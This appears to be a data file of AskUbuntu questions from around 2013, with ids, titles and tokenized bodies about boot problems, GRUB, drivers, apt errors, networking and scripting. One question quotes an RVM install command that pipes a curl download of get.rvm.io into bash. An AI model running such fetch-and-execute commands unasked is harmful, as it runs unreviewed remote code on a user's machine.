347395	laptop screen turns off during startup ? 12.04	i restarted my laptop for the first time in a while , rather than just having it hibernate . my computer wo n't turn on properly now . it turns on , and everything starts going , and it shows a blinking thing in the top left corner , and then the screen turns off . when i press the power key , the screen turns back on again just in time to show the ubuntu shut down screen with the dots . i 'm able to press f2 when i turn it on . i also somehow accessed the terminal ( but i do n't know what buttons i pressed to get there ... ) , and it let me log in with my username and password , but i could n't actually log in to my account from there . help ?
347396	configuring grub2	my problem is getting grub2 to boot ubuntu on my windows7/ubuntu 12.04 dual-boot system . the background : i have a computer that was delivered with windows7 installed . following some advice from the internet , i decreased the size of the windows partition to make space for ubuntu . i now have this : /dev/sda1 ntfs 77 gig windows7 boot /dev/sda2 fat32 5.8 gig shared /dev/sda3 extended 383 gig /dev/sda5 ext4 /boot 500mb /dev/sda6 ext4 / 41 gig /dev/sda7 linux-swap 4,1 gig /dev/sda8 ext4 /home 336 gig i made use of easybcd to boot windows or ubuntu . windows7 boots fine . when i try to boot ubuntu , it stops at the grub prompt . to boot ubuntu i use the following : root ( hd0,4 ) kernel /vmlinuz-3.5.0-23-generic root=/dev/sda6 ro boot and ubuntu boots without problems . i am using it now . my problem is that i do n't know how to get grub to execute those 3 instructions automatically . i have read extensively but have to admit that i do n't understand everything i see . i do lack experience and would appreciate some help . i hope i am not repeating someone else 's question but i am just not making progress . thanks in advance . victor
347398	how to emulate middle-click on two-finger tap on a snaptics touchpad ?	i have a synaptics touchpad whose whole surface is clickable ( so the whole surface physically moves down ) . in windows , i can configure it so pressing the pad with two fingers works like right-click and tapping the pad with two fingers works as middle-click . how can i configure it this way in ubuntu 13.04 ?
347401	how should i install jpeg62 for synfig studio ?	i would like to install synfig studio 0.63 on a computer without an internet connection . at installation , it says to install the `` jpeg62 '' dependency . i have downloaded this but the software centre is not enabling the install button . how should i install this dependency ?
347404	difficulty in connecting to wired network	i have just installed ubuntu 13.04 , 64 bit . ihave successfully configured wireless s ( static ) but wired network is giving me problems . it is giving the same error which is in brackets ( 32 ) alongside a messagewhich says connection failed . if i open network settings , wired network will be off and i switch it on . when i close the network window and open it again , wired network will be off again . can someone help
347407	prevent gnome from running on 12.04	i upgraded from 10.04 to 12.04 the other day , and now i get this warning in my syslog when i reboot : sep 19 17:42:48 myusername gnome-session [ 2251 ] : warning : session 'ubuntu ' runnable check failed : exited with code 5 which i 'm guessing is due to 12.04 using unity instead of gnome ? i know this is only a warning , but i guess i should optimize the system and prevent it from trying to run gnome when it starts up ? i did some googling on this warning and found that for a lot of people this is associated with not being able to login - note that this is not the case for me . everything runs smoothly - i can login , use the web , run all my usual programs , etc . please tell me if i should bother doing anything , and if so then what . thanks !
347408	google chrome opens two tabs when opened	when i open chrome it opens two tabs ( both the home screen ) instead of just one . how do i reduce this to one tab ? i am using ubuntu 12.04
347409	flashplayer acceleration problem	i got a problem with my flash player acceleration . in a flash game , the window that says `` allow the hardware acceleration '' appears to me but i ca n't click allow . my flash player runs smoothly in youtube . can you tell me how to remove flash player and re-install it using terminal commands . here 's an image of the window i 'm talking about :
347411	ubuntu11.10 to latest upgrade	i 've ubuntu 11.10 in my system . and i want to upgrade it . but the default update manager does n't show upgrade status . what do i 've to do . i 've dual boot system with windows 7 in the other . it 's a 64 bit system .
347414	how do i fix broken packages ?	i have a problem with apt . when i try to update or upgrade ubuntu , i receive an error telling me that i have dependency problems , and i ca n't go on . i 've tried to solve the problem with apt-get install -f , aptitude install -f , and using synaptic , but i could n't solve it . when i try to run synaptic , it tells me that i have broken packages , but if i try to delete them , it tells me that it will remove a lot of essential packages like mount and hostname . i think that it would be the end of my ubuntu if i proceed .
347416	ubuntu 12.04 spyware : what to do ?	ubuntu uses the information about searches to show the user ads to buy various things from amazon . amazon commits many wrongs ( see http : //stallman.org/amazon.html ) ; by promoting amazon , canonical contributes to them . however , the ads are not the core of the problem . the main issue is the spying . canonical says it does not tell amazon who searched for what . however , it is just as bad for canonical to collect your personal information as it would have been for amazon to collect it . http : //www.gnu.org/philosophy/ubuntu-spyware.html same question has been asked here ubuntu with spyware ? but i do n't have the tab 'search results ' on my 12.04 distro . how can i disable this ? i understand that canonical uses this business plan in order to make a living and i really would help in their research as long as the data is preserved anonymously , but i really want to have control over this option , so when i search for something to buy , then enable it so i can help canonical gather this data , otherwise i would like this option disabled . thank you
347419	can you place a variable in command line	i have a command running in cron sudo snmpbulkwalk -v 2c -c public -0xsq 10.0.0.98 .1.3.6.1.2.1.1.2 > textfile 10.0.0.98 is a variable and i would like whichever value is placed there to be read in a php script and posted with the command results . is this possible and if so , how can i achieve it
347420	dell touchpad not working in ubuntu	i just downloaded ubuntu and it looked great , but my touchpad would n't work ... my computer is a dell and i 'm a newb at this sort of stuff so if someone could help me , please ?
347421	linux-firmware package continuously downloads during upgrade	i have some quiet time so i 'm finally trying to upgrade my ubuntu 11.10 installation to something newer ( something that 's not out of support , even ) . i 'm trying to upgrade to 12.04 . when using the update manager , it gets stuck downloading one particular package ( number 2057 of 2258 , but i suspect that 's not useful information to anyone ) . so i switched to trying do-release-upgrade from the command line . this gives more information . the problem is with the linux-firmware package . the download gets to 99 % and then it stops and starts again . it never completes . i thought i could get round the problem by downloading the .deb manually and putting it in /var/cache/apt/archives . but i 've tried a number of the mirrors given here and i always get something like this : # wget http : //security.ubuntu.com/ubuntu/pool/main/l/linux-firmware/linux-firmware_1.79.6_all.deb -- 2013-09-19 10:53:08 -- http : //security.ubuntu.com/ubuntu/pool/main/l/linux-firmware/linux-firmware_1.79.6_all.deb resolving localhost ... 127.0.0.1 connecting to localhost|127.0.0.1|:3128 ... connected . proxy request sent , awaiting response ... 200 ok length : 23217718 ( 22m ) [ application/x-debian-package ] saving to : `linux-firmware_1.79.6_all.deb' 99 % [ ===================================== > ] 23,207,936 3.40m/s in 6.5s 2013-09-19 10:53:14 ( 3.40 mb/s ) - connection closed at byte 23207936 . retrying . ... and then the download starts again . and again . and again . until i get bored and cntl-c . i assume that 's why do-release-upgrade gets stuck in a loop too . it seems to me that either the deb file is truncated on the mirrors , or the download is expecting a file that is larger than it really is . can anyone suggest how i can get round this and complete my upgrade ? related launchpad question .
347422	install d-link dwm-156 3g modem ubuntu 13.04	i bought a new d-link 3g modem and it said it supports linux . but after i installed it , i still canât make the device work on ubuntu 13.04 . i used the .deb file from the d-link modem 3g_modem_connect_d300_i386.deb ( from the modem itself ) but i was unable to configure it . i searched the internet , they use dlinkusbmodem.deb file , which is a file from 1 year ago . even after i dpkg it , i still donât know how to proceed . i viewed this youtube and it does n't work with this file version .
347431	fatal bug in precise pangolin	hello once more , i have been using ubuntu 12.04 lts as my only operating system on a nice two year-old computer for about 2 months now . i 've seen while certainly linux is better than windows in lots of aspects , unity causes some problems . but that 's ok , the ctrl+alt commands deal with that fine . suddenly , on this normal day , i get a black screen with the cursor on the center and the words ( approximately ) : bug ( some number ) : unable to handle kernel on the bottomeleft corner of the screen . i had to pull the plug , nothing else worked . so here 's what i was doing : about five minutes ago ( at the time of this writing ) , i was running chrome with lots of tabs open , one terminal window with vim , google earth ( which btw is better on windows , plus there 's confusion when you try to close it , it does n't seem to maximize all the way ) and virtual box . i tried to start my winxp vm and a small message box appears , saying `` trying to create process '' . then i go to switzerland in google earth , see a couple of things , and close it . i go back to the vm creation of process dialog : it never goes beyond 0 % though , so i close it ; bjut it still tries , so i go to the terminal and kill the windows xp window and with it the dialog box . then i see `` aborted '' below the virtual machine 's name , which is logical . i click to start , and it does so immediatly and normally . a little after i go back to chrome ( xp takes a while to start ) , i see the error . is this reported ? is it an ubuntu , linux , google earth , virtual box problem ? how ? how can i fix it ? also , this may be relevant : a few days ago , i followed various instructions to stop the cryptswap mounting problem on boot ( i encrypted my home folder on installation ) . why did this happen ? is it related to any of the stuff i mentioned ? or is it some other problem ?
347433	will i be notified if canonical is required to disclose my personal information ?	in the canonical privacy policy terms is mentioned under : what do we do with the information we collect : to comply with legal and regulatory requirements ( including responding to court orders , subpoenas and to prevent crime ) . these special circumstances may require us to disclose personal information . will i be informed about any disclosure of my personal information ?
347434	driver for rtl-8139 required for enter e-100e ethernet card	i purchased an enter e-100e ethernet card ( http : //www.entermultimedia.com/pci_ethernet_10_100_lancard.html ) today.. i found that ubuntu ca n't detect the device . so , i checked out the device driver , which said : this document contains instructions on installing linux driver and adjusting speed for the series of rtl8139 ( a/b/c/8130 ) network adapter installing driver : ( 1 . ) kernel had supported driver : check the directory `` /lib/modules/ยกk./net `` if you could find `` rtl8139.o '' your kernel had supported rtl8139 series . you could easy use `` linuxconf '' to setup your card . if you do n't like linuxconf , you also could use `` modprobe rtl8139 '' and `` ifconfig up eth0 '' to load module . if your driver load properly , your `` /etc/conf.modules '' should include line of `` alias eth0 rtl8139 '' . ( 2 . ) kernel do n't support driver : if your kernel does n't support rtl8139 series , you should compiler driver by yourself . please contact `` www.scyld.com/network/rtl8139.html '' to get source code . the compiler command is located on the end of source code . maybe like `` gcc -dmodule -wall -wstrict-prototypes -o6 -c rtl8139.c '' . if you could n't compiler success , maybe you should refer to error message and copy library or head file to linux . now , ( 1 ) did n't work for me , as i did not find the said directory ( after replacing the ยกk with linux-headers-3.0.8-19 ) . so , i tried to do ( 2 ) .. but , the website is down.. so , i got the source file , rtl8139.c from some site online.. however , when i tried to compile it with the included command , the compiler showed an error that the /usr/src/linux ( or library , as the case may be ) directory did n't exist.. however , i noticed from this site that the realtek rtl8139 driver is quite famous.. so , i was wondering , am i missing something ? plese help.. i 'm at an dead end.. i 'm new to linux and ubuntu.. so , can someone please tell me what to do ... thanks for taking the time to read this..
347437	installation of ubuntu 13.04 and windows 7 on same partition	i am new to ubuntu and obviously i like it . i have been a windows user for very long and am a bit skeptical to shift completely on to ubuntu . i want to know if it is safe to install ubuntu on the same partition of the same drive that i have windows 7 home premium installed on . i have tried but failed to create any more partitions of my c drive . waiting for your replies . thankyou in advance
347438	what does following error of pulse audio in syslog means	i see following in syslogs /var/log $ sudo fgrep pulseaudio /var/log/syslog sep 19 19:25:06 nanak-p570wm pulseaudio [ 2841 ] : [ pulseaudio ] pid.c : daemon already running . sep 19 19:25:06 nanak-p570wm pulseaudio [ 2843 ] : [ pulseaudio ] pid.c : daemon already running . sep 19 20:14:19 nanak-p570wm pulseaudio [ 4598 ] : [ pulseaudio ] server-lookup.c : unable to contact d-bus : org.freedesktop.dbus.error.notsupported : unable to autolaunch a dbus-daemon without a $ display for x11 sep 19 20:14:19 nanak-p570wm pulseaudio [ 4598 ] : [ pulseaudio ] main.c : unable to contact d-bus : org.freedesktop.dbus.error.notsupported : unable to autolaunch a dbus-daemon without a $ display for x11 sep 19 20:21:30 nanak-p570wm pulseaudio [ 2745 ] : [ pulseaudio ] pid.c : daemon already running . sep 19 20:21:30 nanak-p570wm pulseaudio [ 2747 ] : [ pulseaudio ] pid.c : daemon already running . sep 19 20:23:51 nanak-p570wm pulseaudio [ 2740 ] : [ pulseaudio ] pid.c : daemon already running . sep 19 20:23:51 nanak-p570wm pulseaudio [ 2743 ] : [ pulseaudio ] pid.c : daemon already running . sep 19 20:24:59 nanak-p570wm pulseaudio [ 3567 ] : [ pulseaudio ] server-lookup.c : unable to contact d-bus : org.freedesktop.dbus.error.notsupported : unable to autolaunch a dbus-daemon without a $ display for x11 sep 19 20:24:59 nanak-p570wm pulseaudio [ 3567 ] : [ pulseaudio ] main.c : unable to contact d-bus : org.freedesktop.dbus.error.notsupported : unable to autolaunch a dbus-daemon without a $ display for x11 updating system information os : ubuntu 13.10 linux 3.11.0-7-generic hardware clevo p570wm cpu intel ( r ) core ( tm ) i7-3970x cpu @ 3.50ghz graphics card gk104m [ geforce gtx 780m ] driver=nvidia
347440	postfix domain local and remote mail delivery	i have a postfix server that is at a clients office , they have about 20 local users for whom i download/pop emails from the email service provider and local delivery works fine . there are however a number of remote users with the same domain name but they pop directly from the email service provider . on the postfix server i use fetchmail to retrieve the emails and the remote clients download directly from the email service provider using outlook . the problem i am running in to is when a in-office user tries to send an email to a remote/out of office user , the email fails with an error , unknown user in local recipient table . all of the in-office user can end to each other perfectly . i can work around this issue by removing the domain name from 'mydestination ' within postfix main.cf but then all email even for the local recipients is relayed out of the server the smtp relay host and then downloaded again to the local users/destination , this is costing me an increasing amount of bandwidth and the mail delivery takes 10 - 15 minutes instead of being instant delivery . how can i get the server to relay the outside users email and still deliver the local users emails locally ?
347441	closing windows from alt+tab switcher ?	are there any plugins for compiz that would make it possible to close windows from the alt+tab switcher menu ? it would be a huge boost to my productivity as compared to windows
347442	install package from ppa with setup.py file	i am writing a python program that i want to upload to a ppa so other people can install it on their machine . right now i have a setup.py-file that copies the files to their place and installs the dependencies , if not already done . my point is : to install , the setup.py-file has to be executed . is this done by typing the `` sudo apt-get install 'package-name ' '' ? or do i need a make , controll , install file like debian for this to work ? right now if i wan na install , i type 'sudo python3 setup.py install ' .
347445	how to download a specific version of duplicity	how do i install a specific version of duplicity . the one i have is duplicity 0.6.21 and the one i want is 0.6.18
347446	unable to open ubuntu software center , synaptic manager or install updates	i can not open ubuntu software center , synaptic package manager or install any updates . below is what i get ; an error occurred , please run package manager from the right -click menu or apt get in a terminal to see what wrong . the error message was ' unknown error : ' < type ' exceptions . system error ' > ce : the package language – pack – kde – en- base- needs to be reinstalled , but i can't find an archive for it ) ' this usually means that you installed packages have unmet dependencies . how can i get it fixed ? how am i suppose to do this using terminal ?
347449	is there a ppa for commonly used non-free software ?	i 'm looking for a ppa to easily install packages like skype , google chrome and other commonly used non-free software . does such a ppa exist ? please note that i 'm not looking for ubuntu-restricted-extras .
347450	ubuntu 12.04.3 lts ubuntu tty1	i just downloaded ubuntu on virtualbox and i installed it and after the installation it rebooted and then locked in a black screen and asks for ubuntu login and password . how can i fix this ? thanks
347452	i ca n't see caps lock led in my keyboard when i press caps lock in virtual console ubuntu 12.04	when i open virtual console mode ( ctrl alt f1 or f2 ) and press caps lock , the caps lock led is hidden from my keyboard , this is very frustrating when i write my password .
347453	zebra tlp2844 printer does n't print from firefox	the zebra tlp 2844 printer has been set up for ubuntu 12.04 . it is printing from every other application and also printing the test page properly . but it is not printing from firefox ! ! the print queue shows in status `` stopped '' . it does n't show any other error messages . please help !
347455	can not install edubuntu using usb	i want to install edubuntu 13.04 using usb . i 've gone through this guide but i still have a problem . i 'm running on edubuntu 7.04 , but i ca n't find startup disk creator that the guide refers to . i do n't have it and i ca n't download it . i found startup disk creator on this page but it ca n't be downloaded . help . i 've also posted this issue in edubuntu 's website , facebook ... etc . but , none answered me
347459	installing a kernel from live kubuntu cd	i am a new user and dont know much about os and kernel for that matter . i was installing/updating/uninstalling software using synaptics package manager and i may have uninstalled linux-image-xxx ( xxx stands for some version number ) . the whole process went smoothly but after reboot the pc is not starting . the bios loads but after that it shows a blue screen and restart to repeat the same thing again and again . on further search i found out that these are kernel related files . i have important data on my machine so i do not want to reinstall kubuntu . is there a way i can install the kernel on my internal hard disk from kubuntu live cd . i have search and so far i feel that a combination of these two links could help me : how to repair , restore , or reinstall grub 2 with a ubuntu live cd or usb can i install linux kernel in ubuntu appart of the default one ? i am using kubuntu 10.04 any help/advise/hints/links would be greatly appreciated . even if it is a matter of can be done or not i 'd like to know it . thanks
347460	can not get ubuntu to boot after installation . [ black screen w/ underscore ]	sorry ubuntu community if you have answered this before . i am new here . and i would n't have posted if my problem to me was n't severe . i will try my best to give you a perfect representation on what i see through my problem . i have a p9p67 motherboard w/ uefi bios . i run ubuntu through usb flash drive gnu grub version 2.00 - 13ubuntu3 , i generally have 4 options . i am using try ubuntu without installation to write this . i had windows 7 installed before this and i set the installer to replace windows , i no longer want anything to do with win7 . ubuntu installation goes smooth and installs perfectly , then when it comes to the reboot . i pull out my usb flash when i see the restart and i 'm left with a black screen with a underscore flashing on the left side of my screen . now i did research on this . people are saying that ubuntu installed perfectly but my boot is still on the usb . i could be wrong so i 'm asking the professionals , you guys . i will be keeping my eyes on this post in hopes i can finally run linux today . and ready to answer any questions you may have . i 'm just about giving up , i cant re-install windows and i cant get ubuntu to load . i 'm stuck . if this helps i will post this as a last resort . boot-script result : http : //paste.ubuntu.com/6128688/
347461	how to create an installable package in a ppa the simple way	because i ca n't figure out how to publish my program because i do not understand the packaging , i have some questions : why ca n't i just upload a directory of files* to the ppa , and a setup file that is executed if i type `` sudo apt-get install package-name '' and the setup-file only does these things : copy the files of the directory in the ppa to their location on the users 's system install dependencies ( pyhton3 , python3-pyqt , and such ) is this possible ? *the copied files include the main python script , data files and icons .
347466	configure : error : c compiler can not create executables	i was trying to install rvm using \curl -l https : //get.rvm.io | bash -s stable -- ruby -- autolibs=enable -- auto-dotfiles . it worked fine until i got a configure error : error running './configure -- prefix=/home/nishant/.rvm/rubies/ruby-2.0.0-p247 -- disable-install-doc -- enable-shared ' , please read /home/nishant/.rvm/log/1379591052_ruby-2.0.0-p247/configure.log there has been an error while running configure . halting the installation . following are the contents of the mentioned log file : [ 2013-09-19 17:15:58 ] ./configure current path : /home/nishant/.rvm/src/ruby-2.0.0-p247 command ( 4 ) : ./configure -- prefix=/home/nishant/.rvm/rubies/ruby-2.0.0-p247 -- disable-install-doc -- enable-shared checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking target system type ... i686-pc-linux-gnu checking for gcc ... gcc checking whether the c compiler works ... no configure : error : in `/home/nishant/.rvm/src/ruby-2.0.0-p247 ' : configure : error : c compiler can not create executables see `config.log ' for more details i then tried a `` hello world '' c program and got the following error on compilation : nishant @ nishant-inspiron-1545 : ~ $ gcc -g -o hello hello.c /usr/local/bin/ld : this linker was not configured to use sysroots collect2 : error : ld returned 1 exit status i 'm not sure why this error is thrown . i could n't find a satisfactory answer to this on the forum . could someone please help . thanks
347467	map capslock key to return	i want to remap my capslock key to work as if it was a return key . i 've created a xmodmap file like this : remove lock = caps_lock keycode 66 = return if i run it from terminal : xmodmap /home/me/mods/remove_caps it works fine - when i press capslock it works as if i pressed return and capslock state does not change . but when i add a command to startup like this : /bin/bash -c `` sleep 20 ; /usr/bin/xmodmap /home/kuba/mods/caps '' the capslock key does work as return , but it also changes capslock state . the only difference that i can see is that once the xmodmap command is executed 20s after startup , it misses the remove lock = caps_lock line . how can i fix it ?
347469	dvd ca n't play normal commercial purchased dvd movies	just installed ubuntu on fujitsu laptop . mucic cd plays ok but not dvd . installed ubuntu restricted extras and sudo apt-get install libdvdread4 sudo /usr/share/doc/libdvdread4/install-css.sh apt-get install regionset but still not able to play just normal bought dvd movie . vlc does not recognise output/input any suggestions please .
347473	pages do n't open in different network	i have the following situation , i currently access 3 networks : home ( wireless ) work 1 ( wired ) work 2 ( wireless ) when connected to networks where i work ( 2 and 3 ) , i can access any page . however , when i 'm on my home network ( 1 ) the following problems occur : the https : //my.dx.com/ page is inaccessible . facebook ( https : //www.facebook.com/ ) can log in , but when i browse through my news feed the request to update the feed is not complete . on youtube ( http : //www.youtube.com/ ) can navigate , but when i watch some video , the flash player can not load the video i browse the pages http : //askubuntu.com/ and https : //www.digitalocean.com/ , but can not login ! i was thinking it might be a problem to connect with https , but the page `` https : //www.google.com/ '' loads perfectly ! i can access all these pages cited accessing in my home network , using windows . any idea how i can resolve this issue ? my system : ubuntu 13:04 kernel 3.8.0-19-generic
347475	twitter : alt-gr takes to beggining of the line	my keyboard is set to have alt gr ( right alt key ) select third level characters . now i mainly use serbian keyboard and when i try to mention someone on twitter and try to type @ character i would press alt gr+v , but on twitter website alt gr key takes me to beginning of the line . this happens even if i change to english keyboard , but then i do n't have to use alt key . on any other site , this does n't happen . any idea why ? this also does n't happen to me on windows . output of xmodmap xmodmap : up to 4 keys per modifier , ( keycodes in parentheses ) : shift shift_l ( 0x32 ) , shift_r ( 0x3e ) lock caps_lock ( 0x42 ) control control_l ( 0x25 ) , control_r ( 0x69 ) mod1 alt_l ( 0x40 ) , meta_l ( 0xcd ) mod2 num_lock ( 0x4d ) mod3 mod4 super_l ( 0x85 ) , super_r ( 0x86 ) , super_l ( 0xce ) , hyper_l ( 0xcf ) mod5 iso_level3_shift ( 0x5c ) , mode_switch ( 0xcb )
347477	what is mysterious cursor icon in unity top bar ?	unity 12.04 2d . out of nowhere in the top bar on the right , just left of the ubuntu-classic-menu indicator and just right of the ibus keyboard icon , a little arrow cursor icon has appeared . i click on it , no menu comes up . it never changes state . it is n't a mouse indicator that changes with enable/disable . what is it ? how can i find out all the icons in the top bar without guessing . is there a file with a current list on one 's system ?
347484	install ubuntu 12.04 lts on lenovo u410 alongside windows 8	i successfully installed 12.04 on my lenovo u410 64-bit windows 8 machine after several failed attempts , and i would like to share my solution to this problem with you : first , get the live disc for the version of ubuntu that you want . i installed 12.04 lts . windows 8 ( in my experience ) is usually run on 64-bit machines , so you 'll likely need the 64-bit version of 12.04 . next , put the live disc in your optical drive . despite what you may expect , you will not be able to successfully boot off of the live disc because of the firmware called secure boot . this is in place to prevent someone from accessing the admin account for windows 8 and stealing your information . the next step is to get around this firmware . next , go into the general settings found under the 'change pc settings ' menu . scroll to the bottom and click the 'advanced start-up ' section and click the button that says 'restart now ' . you will see a waiting screen , and then several options to click on . click on 'troubleshooting ' . then click on 'advanced options ' . then click 'uefi firmware settings ' . then click on the restart button shown on your screen . this restarts your computer and gives you access to your bios . use your tab key to get to a tab that says something like 'app menu ' . then arrow to the option that says setup and hit enter . you 'll then see a blue screen that has several tabs at the top . go to the 'security ' tab and there will be an option for 'secure boot ' that should be greyed out . if it 's not , then arrow down to it and hit enter , then select 'disabled ' . otherwise , go through the tabs and look for an option that has the abbreviation 'uefi ' next to it . change this option to 'legacy support ' . you should then see an option in the same menu that says 'boot priority ' . change this from 'uefi first ' to 'legacy first ' . then hit the function key that saves and exits the bios . you should now be able to boot from the live disc and install ubuntu . enjoy !
347490	ubuntu software center is unaccessible	when i open ubuntu software center , it appears for sometime with a stopped loading circle and closes automatically . i have been trying to install google chrome but as ubuntu software center is unaccessible . this is the error when i 'm running software center from terminal : 2013-09-19 19:24:44,982 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-09-19 19:24:44,987 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-09-19 19:24:45,407 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-09-19 19:24:45,549 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-09-19 19:24:46,194 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/glug.nith.ac.in_ubuntu_archives_dists_precise_universe_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . 2013-09-19 19:24:47,141 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
347491	ubuntu 13.04 black screen after login	i have ubuntu 13.04 installed and it goes to the log in screen . when i put the password to log in or try to log in with the guest account , it goes to a black screen where i can only move the mouse cursor . my ubuntu does n't have the option to chose the ubuntu 2d . i could n't find any solution . anyone knows how can i access it again or how to copy a folder to another partition so i can re install it without losing my work ?
347494	indexerror : list index out of range	# ! /usr/bin/env python import httplib import sys # get http server ip http_server = sys.argv [ 0 ] # create a connection conn = httplib.httpconnection ( http_server ) while 1 : cmd = raw_input ( 'input command ( ex . get index.html ) : ' ) cmd = cmd.split ( ) if cmd [ 0 ] == 'exit ' : # type exit to end it break # request command to server conn.request ( cmd [ 0 ] , cmd [ 1 ] ) # get response from server rsp = conn.getresponse ( ) # print server response and data print ( rsp.status , rsp.reason ) data_received = rsp.read ( ) print ( data_received ) conn.close ( ) error traceback ( most recent call last ) : file `` ./client1.py '' , line 19 , in < module > conn.request ( cmd [ 0 ] , cmd [ 1 ] ) indexerror : list index out of range can any one tell me why that error is coming and can anyone modify the code . it is a client side code to connect with server my input is : get index.html but now my error is file `` ./client1.py '' , line 19 , in < module > conn.request ( cmd [ 0 ] , cmd [ 1 ] ) file `` /usr/lib/python2.6/httplib.py '' , line 910 , in request self._send_request ( method , url , body , headers ) file `` /usr/lib/python2.6/httplib.py '' , line 947 , in _send_request self.endheaders ( ) file `` /usr/lib/python2.6/httplib.py '' , line 904 , in endheaders self._send_output ( ) file `` /usr/lib/python2.6/httplib.py '' , line 776 , in _send_output self.send ( msg ) file `` /usr/lib/python2.6/httplib.py '' , line 735 , in send self.connect ( ) file `` /usr/lib/python2.6/httplib.py '' , line 716 , in connect self.timeout ) file `` /usr/lib/python2.6/socket.py '' , line 500 , in create_connection for res in getaddrinfo ( host , port , 0 , sock_stream ) : socket.gaierror : [ errno -2 ] name or service not known
347497	changing resolution in ubuntu server 12.04	i 'm a linux newbie and i 've now tried lots of different ways of doing this , but every single one fails somewhere - usually because they pertain to ubuntu desktop rather than server and rely on packages being present which are n't , or a graphical interface . i 'm running 12.04 server - fresh install in a vm i 've tried editing /etc/default/grub followed by update-grub and reboot - this either achieves nothing , or results in a failure to reboot . i try to run vbeinfo and it says unknown command . how can i increase the size of the console window ? i 've tried using xrandr which required a package install of x11-server-utils , but after installation all i got when i typed xrandr was ca n't open display some comments have talked about `` grub menu '' ... what is this - if i type grub it tells me to install a package - i do so , and type grub and i get the grub console ... is this helpful ?
347500	what causes overriding mode 0555	while learning how to write scripts and work solely through the terminal i am experiencing an issue in regards to overwriting a .jpg with the message : mv : try to overwrite foo.jpg , overriding mode 0555 ( r-xr-xr-r ) ? i was curious to know : what causes this error message ? why is this message not displayed for every image but some images ? how can i correct this ? edit : would also like to know what r-xr-xr-r mean and how i can use them .
347502	avprobe - does n't output json document	i 'm trying to create a json file with information of a mp4 file with avprobe , but it does n't print nothing . the command avprobe -v 0 -show_format -of json myvideo.mp4 my avprobe version avprobe version 0.8.6-6:0.8.6-1ubuntu2 , copyright ( c ) 2007-2013 the libav developers built on mar 30 2013 22:20:06 with gcc 4.7.2 avprobe 0.8.6-6:0.8.6-1ubuntu2 libavutil 51 . 22 . 1 / 51 . 22 . 1 libavcodec 53 . 35 . 0 / 53 . 35 . 0 libavformat 53 . 21 . 1 / 53 . 21 . 1 libavdevice 53 . 2 . 0 / 53 . 2 . 0 libavfilter 2 . 15 . 0 / 2 . 15 . 0 libswscale 2 . 1 . 0 / 2 . 1 . 0 libpostproc 52 . 0 . 0 / 52 . 0 . 0 this avprobe -v 0 -show_format -show_streams myvideo.mp4 shows me some the video information in a ini format .
347503	what is the /media/myname/ssh2013-09-16 directory for ?	i noticed today that there is a directory located in /media/myusername called `` ssh2013-09-16 '' . i tried to remove it , but rmdir reports `` device or resource busy '' . this even happens if i try to remove it with sudo . does anyone know what this directory is for , if it should be there , and if not , how i can remove it ? thanks ! note : i am running ubuntu 12.10 64bit desktop
